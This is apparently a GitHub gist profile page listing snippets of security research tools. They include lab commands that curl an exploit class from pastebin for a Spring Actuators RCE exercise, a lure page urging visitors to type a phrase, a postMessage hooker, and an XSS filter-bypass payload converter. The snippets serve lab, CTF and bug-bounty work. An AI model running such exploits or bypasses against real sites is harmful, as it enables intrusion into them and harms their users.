Skip to content

Instantly share code, notes, and snippets.

View YasserGersy's full-sized avatar

YasserGersy

165 followers · 83 following
View GitHub Profile
@YasserGersy
YasserGersy / Reader.py
Created May 14, 2022 03:59
Python script to search for specific strings in big files
#!/bin/python -e
import sys,os,glob,time
errors_count=0
max_id=100011265576762
debug=False
start=time.time()
def GetSecondsPassed():
global start
end=time.time()
@YasserGersy
YasserGersy / pentesterlab.com___spring-actuators.sh
Created October 7, 2020 21:42
https://pentesterlab.com/exercises/spring-actuators commands
mkdir src
mkdir src/META-INF
mkdir src/META-INF/services
curl https://pastebin.com/raw/XbCvxXT6 -o src/ExploitScriptEngineFactory.java
echo 'ExploitScriptEngineFactory' > src/META-INF/services/javax.script.ScriptEngineFactory
docker run -it -v `pwd`:/code openjdk /bin/bash
cd /code
javac -source 1.8 -target 1.8 src/ExploitScriptEngineFactory.java
@YasserGersy
YasserGersy / index.html
Created June 21, 2019 10:22
// source https://jsbin.com
<html>
<meta name="referrer" content="unsafe-url">
<body onload="f()">
<a href="" id="h"> home </a><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/>
<div id="div1">
</div>
</hr><p style="float:left;">Type</p> <p style="color:green;padding-left : 20px;float:left;" >win-a-bicycle</p> <p style="padding-left : 20px;float:left;">in the two boxes and click enter</p><br/><img src="http://tiny.cc/img3" />
@YasserGersy
YasserGersy / Post.Message.html
Last active July 20, 2020 06:12
Post Message Hooker
<!DOCTYPE html>
<!-- Author Yasser Gersy @yassergersy v 2 -->
<html>
<head>
<meta charset="utf-8">
</head>
<script>
var last_message='';
var rcvd_msg_count=-2;
@YasserGersy
YasserGersy / pythphp_get_func_names.py
Created November 19, 2018 14:49
Get List of php and python functions
import requests
r=requests.get('http://php.net/manual/en/indexes.functions.php')
res=""
for p in r.text.encode('utf-8').split('<a href="'):
if p.startswith('function'):
z=(p.split('"')[0].split('function.')[1]).replace('-','_')[0:-4]
res=res+z+"\r"
open('php_fun_names.txt','w').write(res)
@YasserGersy
YasserGersy / dirlister.py
Created July 9, 2018 23:35
Find directory listing in websites using wfuzz
import sys,os,requests
print """
____________________________________________________
Dir listing finder
usage python dirlister.py domains_path list_path
requirements wfuzz , python-requests
_____________________________________________________
"""
@YasserGersy
YasserGersy / H1LP.py
Last active November 19, 2018 14:54
H1LP.py loads hackerone open programs
#!/bin/python
import requests
try:
requests.packages.urllib3.disable_warnings()
except:
print 'Error'
print 'Hackerone programs loader'
print '--------------------------------------------------------'
@YasserGersy
YasserGersy / HackthisSite_realistic_6.py
Last active November 19, 2018 14:55
HackthisSite realistic 6
def most_common(lst):
return max(set(lst), key=lst.count)
def stripme(d):
z=''
for c in d:
if c in '0123456789':
z=z+c
return z
@YasserGersy
YasserGersy / secretbox-sol.py
Last active March 3, 2018 20:19
Cyber-talent secretbox solution secret-box
#CTF https://cybertalents.com/competitions/quals-uae-egy-national-cyber-security-ctf-2018/secret-box
#https://s3-eu-west-1.amazonaws.com/hubchallenges/Reverse/secretbox.zip
#
#
#The code takes the message
#reveres it
# msg bitwised with the length of image file name
#Each char at i postioton in the MSG is stored in the image at postition [0,i][3]
#
#python secretbox-sol.py secret.png
@YasserGersy
YasserGersy / Js2S.py
Last active April 16, 2024 02:50
javascript mutil lines payload into one line
#The main purpose is to bypass xss filters and execute multi lines payload
#write your payload to a file.txt
#run the script and pass the file as argument
# $python js2S.py file.txt
# copy the output and pass the output paylad to a javascript function document.write or eval ,, etc ,
#for example , http://vuln2-xss.com/?name=document.write(__output__)
#if any character from the following is filtered , remove it.
import sys,os